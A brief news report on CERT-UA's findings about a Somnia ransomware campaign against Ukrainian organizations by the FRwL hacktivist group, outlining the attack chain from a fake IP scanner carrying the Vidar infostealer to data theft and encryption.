Russian hacktivists encrypted systems and caused disruptions to several Ukrainian organizations using a new version of the Somnia ransomware. CERT-UA confirmed the incident and blamed From Russia with Love (FRwL), also known as the Z-Team, tracked by UAC-0118.
It is worth noting that the accusations are not groundless: the hacktivists announced the creation of Somnia in their Telegram channel and even posted evidence of attacks on a Ukrainian organization engaged in the production of tanks.
An investigation conducted by CERT-UA showed that the attack began with the victim downloading and running a file posing as software called “Advanced IP Scanner”, which actually contained the Vidar infostealer. This malware steals Telegram session data, which, in the absence of two-factor authentication and a passcode, allows attackers to gain access to the victim's account.
As it was established, the Telegram account was needed by hackers to steal VPN connection data (including certificates and authentication data). Having gained remote access to the organization's computer network using a VPN, the attackers conducted reconnaissance (using Netscan), launched a Cobalt Strike beacon and stole valuable data using Rclone. In addition, there are signs of the launch of Anydesk and Ngrok.
Specialists noted that Somnia has been modified. If the symmetric 3DES algorithm was used in the first version of the program, then the AES algorithm is implemented in the second version. And given the dynamism of the key and the initialization vector, CERT-UA assumes that this version of the malware does not provide data decryption.